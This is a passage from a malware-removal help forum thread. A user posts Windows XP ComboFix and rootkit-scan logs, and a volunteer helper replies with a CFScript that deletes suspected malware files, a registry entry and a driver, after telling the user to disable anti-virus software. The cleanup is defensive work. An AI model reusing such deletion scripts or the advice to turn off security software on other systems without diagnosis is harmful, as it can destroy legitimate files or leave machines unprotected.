[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"e:\\Program Files\\Opera\\opera.exe"=
"e:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"e:\\Program Files\\iTunes\\iTunes.exe"=
"e:\\Program Files\\uTorrent\\uTorrent.exe"=
"e:\\Program Files\\Veoh Networks\\VeohWebPlayer\\veohwebplayer.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsasvr.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsvsvr.exe"=

R0 PCTCore;PCTools KDS;e:\windows\system32\drivers\PCTCore.sys [29/07/2010 10:10 218592]
R1 cmdGuard;COMODO Internet Security Sandbox Driver;e:\windows\system32\drivers\cmdGuard.sys [04/06/2010 11:55 229312]
R1 cmdHlp;COMODO Internet Security Helper Driver;e:\windows\system32\drivers\cmdhlp.sys [01/06/2010 19:00 25240]
R1 SASDIFSV;SASDIFSV;e:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 19:25 12872]
R1 SASKUTIL;SASKUTIL;e:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 19:41 67656]
R2 a2free;a-squared Free Service;e:\program files\a-squared Free\a2service.exe [13/06/2010 17:14 1872320]
R2 FsUsbExService;FsUsbExService;e:\windows\system32\FsUsbExService.Exe [20/04/2010 11:18 237984]
R3 BCASPROT;Advanced System Protector;e:\program files\Systweak\Advanced System Protector\sasprot32.sys [15/06/2010 13:39 6656]
R3 FsUsbExDisk;FsUsbExDisk;e:\windows\system32\FsUsbExDisk.Sys [20/04/2010 11:18 36608]
S2 wscsvcSpooler;Security Center wscsvcSpooler;e:\windows\system32\adsldpca.exe srv --> e:\windows\system32\adsldpca.exe srv [?]
S3 aswArKrn;aswArKrn;\??\e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys --> e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys [?]
S3 MEMSWEEP2;MEMSWEEP2;\??\e:\windows\system32\8C.tmp --> e:\windows\system32\8C.tmp [?]
S3 s1018bus;Sony Ericsson Device 1018 driver (WDM);e:\windows\system32\drivers\s1018bus.sys [01/04/2010 18:33 86824]
S3 s1018mdfl;Sony Ericsson Device 1018 USB WMC Modem Filter;e:\windows\system32\drivers\s1018mdfl.sys [02/04/2010 11:00 15016]
S3 s1018mdm;Sony Ericsson Device 1018 USB WMC Modem Driver;e:\windows\system32\drivers\s1018mdm.sys [02/04/2010 11:00 114728]
S3 s1018mgmt;Sony Ericsson Device 1018 USB WMC Device Management Drivers (WDM);e:\windows\system32\drivers\s1018mgmt.sys [02/04/2010 11:00 106208]
S3 s1018nd5;Sony Ericsson Device 1018 USB Ethernet Emulation (NDIS);e:\windows\system32\drivers\s1018nd5.sys [01/04/2010 18:33 26024]
S3 s1018obex;Sony Ericsson Device 1018 USB WMC OBEX Interface;e:\windows\system32\drivers\s1018obex.sys [02/04/2010 11:00 104744]
S3 s1018unic;Sony Ericsson Device 1018 USB Ethernet Emulation (WDM);e:\windows\system32\drivers\s1018unic.sys [01/04/2010 18:33 109864]
S4 sptd;sptd;e:\windows\system32\drivers\sptd.sys [02/02/2010 01:58 691696]

--- Other Services/Drivers In Memory ---

*Deregistered* - PCTSDInjDriver32
*Deregistered* - sdAuxService
*Deregistered* - sdCoreService

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
bdx REG_MULTI_SZ scan
.
.
------- Supplementary Scan -------
.
IE: Convert link target to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
FF - ProfilePath - e:\documents and settings\Mike\Application Data\Mozilla\Firefox\Profiles\99m84v2t.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.co.uk/
FF - plugin: e:\program files\DivX\DivX Plus Web Player\npdivx32.dll
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - e:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

---- FIREFOX POLICIES ----
FF - user.js: network.cookie.cookieBehavior - 0
FF - user.js: privacy.clearOnShutdown.cookies - false
FF - user.js: security.warn_viewing_mixed - false
FF - user.js: security.warn_viewing_mixed.show_once - false
FF - user.js: security.warn_submit_insecure - false
FF - user.js: security.warn_submit_insecure.show_once - false
e:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_colors", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.lu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nz", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbaam7a8h", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4ar", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--p1ai", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbayh7gpa", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.tel", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.auth.force-generic-ntlm", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.proxy.type", 5);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.count", 24);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.size", 4096);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.ipc.plugins.timeoutSecs", 45);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("svg.smil.enabled", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("accelerometer.enabled", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.allow_unrestricted_renego_everywhere__temporarily_available_pref", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.renego_unrestricted_hosts", "");
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.treat_unsafe_negotiation_as_broken", false);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.require_safe_negotiation", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.name", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.description", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.update.notifyUser", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.nptest.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npswf32.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npctrl.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npqtplugin.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled", false);
.
- - - - ORPHANS REMOVED - - - -

ShellExecuteHooks-{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - e:\program files\SUPERAntiSpyware\SASSEH.DLL
MSConfigStartUp-Acrobat Assistant 7 - e:\program files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
MSConfigStartUp-QuickTime Task - e:\program files\QuickTime\QTTask.exe
AddRemove-Adobe SVG Viewer - e:\program files\Common Files\Adobe\SVG Viewer 3.0\Uninstall\Winstall.exe
AddRemove-Broadcom 802.11b Network Adapter - e:\program files\Dell\Dell Wireless WLAN Card\bcmwlu00.exe
AddRemove-CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFA&SUBSYS_14F100C3 - e:\program files\CONEXANT\CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFA&SUBSYS_14F100C3\HXFSETUP.EXE
AddRemove-{D8CE69B0-9274-4b8c-BA49-0FF6A20A3C65} - e:\program files\SAMSUNG\SYMBIAN USB Download Driver\Uninstall.exe



**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-08-07 23:49
Windows 5.1.2600 Service Pack 2 NTFS

detected NTDLL code modification:
ZwClose, ZwOpenFile

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet005\Services\MEMSWEEP2]
"ImagePath"="\??\e:\windows\system32\8C.tmp"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(844)
e:\windows\system32\guard32.dll
e:\program files\SUPERAntiSpyware\SASWINLO.DLL
e:\windows\system32\WININET.dll
e:\windows\System32\BCMLogon.dll

- - - - - - - > 'lsass.exe'(900)
e:\windows\system32\guard32.dll
e:\program files\Common Files\PC Tools\Lsp\PCTLsp.dll
.
Completion time: 2010-08-07 23:51:50
ComboFix-quarantined-files.txt 2010-08-07 22:51
ComboFix2.txt 2010-07-26 13:37

Pre-Run: 32,983,543,808 bytes free
Post-Run: 33,033,322,496 bytes free

Current=5 Default=5 Failed=3 LastKnownGood=6 Sets=1,2,3,4,5,6
- - End Of File - - 483A04C3C839B5ABB5CF94103981E961
[/codebox]


All the best

Mike

Attached Files



#7 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 07 August 2010 - 06:36 PM

Okay, some signs of malware. Please rerun Combofix as below.

1. Close any open browsers.

2. Close/disable all anti-virus and anti-malware programs so they do not interfere with the running of ComboFix.

3. Open notepad and copy/paste the text in the box below into it:

QUOTE
http://www.bleepingcomputer.com/forums/ind...view=getnewpost

Collect::
e:\documents and settings\Mike\Start Menu\Programs\Startup\sisytj32.exe

File::
e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat
e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin
e:\windows\Oyavogikewejog.bin
e:\windows\Szuyoc.dat
e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat
e:\documents and settings\Mike\Application Data\ofubwi.dat
e:\windows\pss\sisytj32.exe
e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys

Registry::
[-HKLM\~\startupfolder\E:^Documents and Settings^Mike^Start Menu^Programs^Startup^sisytj32.exe]

Driver::
aswArKrn


Save this as CFScript.txt, in the same location as ComFix.exe (called ComboFix.exe in the below graphic)

Referring to the picture above, drag CFScript into ComboFix.exe

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.
m0le is a proud member of UNITE

#8 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  • Local time:10:39 PM

Posted 07 August 2010 - 07:28 PM

Hi M0le

QUOTE
ComboFix 10-08-07.01 - Mike 08/08/2010 0:49.6.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.2.1252.44.1033.18.1015.716 [GMT 1:00]
Running from: e:\documents and settings\Mike\Desktop\ComFix.exe
Command switches used :: e:\documents and settings\Mike\Desktop\CFScript.txt
FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}

FILE ::
"e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys"
"e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin"
"e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat"
"e:\documents and settings\Mike\Application Data\ofubwi.dat"
"e:\windows\Oyavogikewejog.bin"
"e:\windows\pss\sisytj32.exe"
"e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat"
"e:\windows\Szuyoc.dat"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin
e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat
e:\documents and settings\Mike\Application Data\ofubwi.dat
e:\program files\Microsoft\DesktopLayer.exe
e:\windows\Oyavogikewejog.bin
e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat
e:\windows\Szuyoc.dat

.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Legacy_ASWARKRN
-------\Service_aswArKrn


((((((((((((((((((((((((( Files Created from 2010-07-08 to 2010-08-08 )))))))))))))))))))))))))))))))
.

2010-08-01 11:06 . 2010-08-01 11:07 -------- d-----w- e:\documents and settings\Admin\Application Data\PSpad
2010-08-01 10:34 . 2010-08-01 10:34 -------- d--h--w- e:\windows\PIF
2010-07-30 06:46 . 2010-08-07 23:01 46080 ----a-w- e:\windows\ExplorerSrv.exe
2010-07-29 21:11 . 2010-07-29 21:11 -------- d-----w- e:\documents and settings\Admin\Application Data\Malwarebytes
2010-07-29 20:38 . 2010-07-29 20:38 -------- d-----w- e:\documents and settings\Admin\Application Data\Systweak
2010-07-29 09:11 . 2010-02-05 08:17 233136 ----a-w- e:\windows\system32\drivers\pctgntdi.sys
2010-07-29 09:10 . 2010-03-29 09:06 218592 ----a-w- e:\windows\system32\drivers\PCTCore.sys
2010-07-29 09:10 . 2009-11-23 12:54 88040 ----a-w- e:\windows\system32\drivers\PCTAppEvent.sys
2010-07-29 09:09 . 2010-08-07 23:05 -------- d-----w- e:\program files\Common Files\PC Tools
2010-07-29 09:03 . 2010-07-29 21:37 -------- d-----w- e:\documents and settings\Admin\Microsoft
2010-07-28 20:16 . 2010-07-28 20:18 63488 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10006.dll
2010-07-28 20:16 . 2010-07-28 20:18 117760 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\UIREPAIR.DLL
2010-07-28 20:16 . 2010-07-28 20:16 52224 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10005.dll
2010-07-28 20:12 . 2010-07-28 20:12 -------- d-----w- E:\VritualRoot
2010-07-28 20:11 . 2010-07-28 20:12 -------- d-----w- e:\documents and settings\All Users\Application Data\COMODO
2010-07-28 20:09 . 2010-07-28 20:09 -------- d-----w- e:\program files\COMODO
2010-07-28 20:02 . 2010-07-28 20:08 -------- d-----w- e:\documents and settings\All Users\Application Data\Comodo Downloader
2010-07-28 14:35 . 2010-07-28 14:35 -------- d-----w- e:\program files\ESET
2010-07-22 11:16 . 2010-07-22 11:16 -------- d-----w- E:\modules
2010-07-21 20:53 . 2010-07-28 17:25 -------- d-----w- e:\program files\riva
2010-07-21 20:52 . 2010-08-08 00:13 -------- d-----w- e:\program files\Microsoft

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-08-07 22:33 . 2010-06-15 10:25 -------- d---a-w- e:\documents and settings\All Users\Application Data\TEMP
2010-08-07 12:58 . 2010-02-06 23:45 -------- d-----w- e:\documents and settings\Mike\Application Data\vlc
2010-08-01 10:53 . 2010-02-01 22:06 23928 ----a-w- e:\documents and settings\Admin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-07-31 10:57 . 2010-02-02 09:06 -------- d-----w- e:\program files\Common Files\Adobe
2010-07-29 21:11 . 2010-05-04 20:03 -------- d-----w- e:\program files\Malwarebytes' Anti-Malware
2010-07-29 09:59 . 2010-07-29 10:06 6144 ------w- e:\windows\system32\2.tmp
2010-07-28 20:49 . 2010-05-04 20:10 -------- d-----w- e:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-07-28 17:24 . 2010-02-01 23:35 -------- d-----w- e:\program files\Opera
2010-07-28 15:18 . 2010-02-02 11:34 -------- d-----w- e:\program files\ZipGenius 6
2010-07-28 15:17 . 2010-06-10 12:27 -------- d-----w- e:\program files\SUPERAntiSpyware
2010-07-28 15:14 . 2010-02-01 23:55 -------- d-----w- e:\program files\QuickTime
2010-07-28 15:14 . 2010-02-02 10:19 -------- d-----w- e:\program files\PSPad editor
2010-07-28 15:14 . 2010-04-20 10:17 -------- d-----w- e:\program files\PC Connectivity Solution
2010-07-28 15:12 . 2010-05-13 09:34 -------- d-----w- e:\program files\Duplicate Cleaner
2010-07-28 15:11 . 2010-02-02 00:58 -------- d-----w- e:\program files\DAEMON Tools Lite
2010-07-28 15:11 . 2010-02-27 07:31 -------- d-----w- e:\program files\Common Files\DivX Shared
2010-07-28 15:09 . 2010-06-11 16:33 -------- d-----w- e:\program files\CCleaner
2010-07-28 15:09 . 2010-04-29 16:29 -------- d-----w- e:\program files\Audacity
2010-07-28 15:00 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared HiJackFree
2010-07-28 14:59 . 2010-02-02 11:34 -------- d-----w- e:\program files\7-Zip
2010-07-26 09:40 . 2010-02-01 23:17 -------- d-----w- e:\program files\BitDefender
2010-07-26 09:33 . 2010-02-01 23:25 81984 ----a-w- e:\windows\system32\bdod.bin
2010-07-24 12:56 . 2010-02-11 13:14 -------- d-----w- e:\documents and settings\Mike\Application Data\uTorrent
2010-07-24 11:27 . 2010-02-02 10:57 -------- d-----w- e:\documents and settings\Mike\Application Data\FileZilla
2010-07-23 20:37 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared Free
2010-07-23 17:37 . 2010-03-19 12:17 -------- d-----w- e:\documents and settings\Mike\Application Data\Aczy
2010-07-23 16:23 . 2010-04-25 07:45 -------- d-----w- e:\documents and settings\Mike\Application Data\Nuunn
2010-07-11 09:22 . 2010-05-29 15:34 -------- d-----w- e:\documents and settings\Erin\Application Data\vlc
2010-07-09 20:48 . 2010-04-06 23:07 -------- d-----w- e:\documents and settings\Erin\Application Data\uTorrent
2010-07-05 20:05 . 2010-02-02 09:36 23928 ----a-w- e:\documents and settings\Mike\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-06-26 13:39 . 2010-06-26 13:39 -------- d-----w- e:\documents and settings\Erin\Application Data\Systweak
2010-06-15 16:48 . 2010-06-15 16:44 43488992 ----a-w- e:\documents and settings\All Users\Application Data\Systweak\Advanced System Protector\Antispyware_Setup_6_15_2010.exe
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\Mike\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\All Users\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\program files\Systweak
2010-06-15 11:43 . 2010-06-09 09:34 -------- d-----w- e:\program files\Common Files\Little Registry Cleaner
2010-06-15 11:43 . 2010-06-09 09:32 -------- d-----w- e:\program files\Little Registry Cleaner
2010-06-15 11:42 . 2010-06-15 10:59 -------- d-----w- e:\program files\Win 32.Trojan Downloader.Murlo Removal Tool
2010-06-15 09:29 . 2010-06-15 09:29 -------- dc-h--w- e:\documents and settings\All Users\Application Data\{74D08EB8-01D1-4BAE-91E3-F30C1B031AC6}
2010-06-13 16:13 . 2010-06-13 16:13 388096 ----a-r- e:\documents and settings\Mike\Application Data\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-06-13 16:13 . 2010-06-13 16:13 -------- d-----w- e:\program files\Trend Micro
2010-06-12 14:36 . 2010-06-12 14:36 -------- d-----w- e:\program files\Sophos
2010-06-12 01:31 . 2010-06-11 22:52 -------- d-----w- e:\program files\Windows Live Safety Center
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2010-06-10 11:03 . 2010-02-01 19:40 77423 ----a-w- e:\windows\pchealth\helpctr\OfflineCache\index.dat
2010-06-04 10:55 . 2010-06-04 10:55 229312 ----a-w- e:\windows\system32\drivers\cmdGuard.sys
2010-06-01 18:00 . 2010-06-01 18:00 278288 ----a-w- e:\windows\system32\guard32.dll
2010-06-01 18:00 . 2010-06-01 18:00 87824 ----a-w- e:\windows\system32\drivers\inspect.sys
2010-06-01 18:00 . 2010-06-01 18:00 25240 ----a-w- e:\windows\system32\drivers\cmdhlp.sys
2010-06-01 18:00 . 2010-06-01 18:00 15464 ----a-w- e:\windows\system32\drivers\cmderd.sys
2010-06-01 15:47 . 2010-04-08 08:19 19616 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
.

((((((((((((((((((((((((((((( SnapShot@2010-07-26_13.35.37 )))))))))))))))))))))))))))))))))))))))))
.
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
+ 2009-12-21 19:09 . 2009-12-21 19:09 16832 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\ViewerPS.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 35760 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\reader_sl.exe
+ 2009-12-21 19:02 . 2009-12-21 19:02 79280 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlr.dll
+ 2009-12-21 22:21 . 2009-12-21 22:21 99776 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\eula.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 70584 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobeextractfiles.dll
+ 2009-12-21 22:37 . 2009-12-21 22:37 27048 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrotextextractor.exe
+ 2009-12-21 17:39 . 2009-12-21 17:39 15288 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32Info.exe
+ 2009-12-21 17:27 . 2009-12-21 17:27 75200 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acroiehelpershim.dll
+ 2009-12-21 17:27 . 2009-12-21 17:27 61888 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroIEHelper.dll
- 2010-02-02 09:13 . 2010-02-02 09:13 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\readerupdater.exe
+ 2009-12-21 17:35 . 2009-12-21 17:35 378264 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\pdfshell.dll
+ 2009-12-21 19:05 . 2009-12-21 19:05 116168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlrShim.exe
+ 2009-12-21 17:34 . 2009-12-21 17:34 103864 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\nppdf32.dll
+ 2009-11-09 18:18 . 2009-11-09 18:18 684032 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JP2KLib.dll
+ 2009-12-21 19:02 . 2009-12-21 19:02 542168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AdobeCollabSync.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 948672 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobearm.exe
+ 2009-12-21 17:43 . 2009-12-21 17:43 120240 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRdIF.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 349616 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.exe
+ 2009-12-21 17:15 . 2009-12-21 17:15 660912 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroPDF.dll
+ 2009-12-21 18:32 . 2009-12-21 18:32 280024 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobroker.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobatupdater.exe
+ 2009-12-21 18:15 . 2009-12-21 18:15 251296 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\a3dutility.exe
+ 2004-06-01 09:36 . 2004-06-01 09:36 214512 e:\windows\Installer\$PatchCache$\Managed\68AB67CA330100007706000000000020\7.0.0\icudt26l.dat
+ 2010-06-20 08:01 . 2010-06-20 08:01 8040960 e:\windows\Installer\90f09a.msp
+ 2010-07-31 10:58 . 2010-07-31 10:58 3940352 e:\windows\Installer\90f099.msi
+ 2010-07-28 16:26 . 2010-07-28 16:26 2647552 e:\windows\Installer\8f997b.msi
+ 2010-07-28 20:10 . 2010-07-28 20:10 3648000 e:\windows\Installer\571b0.msi
+ 2009-12-21 17:29 . 2009-12-21 17:29 2409880 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\rt3d.dll
+ 2009-12-21 18:00 . 2009-12-21 18:00 1298996 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JSByteCodeWin.bin
+ 2009-12-21 22:31 . 2009-12-21 22:31 5713920 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AGM.dll
+ 2010-04-04 06:54 . 2010-04-04 06:54 11850240 e:\windows\Installer\90f09b.msp
+ 2009-12-21 22:21 . 2009-12-21 22:21 20436408 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
